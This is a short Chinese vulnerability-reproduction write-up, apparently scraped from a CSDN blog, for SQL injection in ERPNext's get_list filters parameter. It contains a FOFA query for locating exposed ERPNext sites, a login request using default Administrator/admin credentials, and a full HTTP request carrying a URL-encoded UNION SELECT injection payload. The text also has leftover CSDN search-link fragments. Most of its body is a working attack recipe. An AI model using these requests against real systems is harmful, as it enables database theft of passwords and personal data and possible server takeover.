E7-1ERPNext-企业资源计划系统-SQL
漏洞描述:
ERPNext 系统frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
网站图片:
网络测绘:
fofa语法:
FOFA:app=“ERPNext”
漏洞复现:
获取有效cookie
POST / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 52
cmd=login&usr=Administrator&pwd=admin&device=desktop
尝试注入(/upload/images/searchq=%E6%B3%A8%E5%85%A5spm=1001.2101.3001.7020)
GET /api/method/frappe.model.db_query.get_list?filters=%7b%22name%20UNION+SELECT+%40%40version%20--%20%22%3a%20%22administrator%22%7d&fields=%5b%22name%22%5d&doctype=User&limit=20&order_by=name&_=1615372773071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: 获取到的cookie;system_user=yes;full_name=Administrator;user_id=Administrator;user_image=/files/RichMake.jpg;
Accept-Encoding: gzip
查询数据库版本(https://so.csdn.net/so/search?q=%E6%9F%A5%E8%AF%A2%E6%95%B0%E6%8D%AE%E5%BA%93%E7%89%88%E6%9C%AC&spm=1001.2101.3001.7020)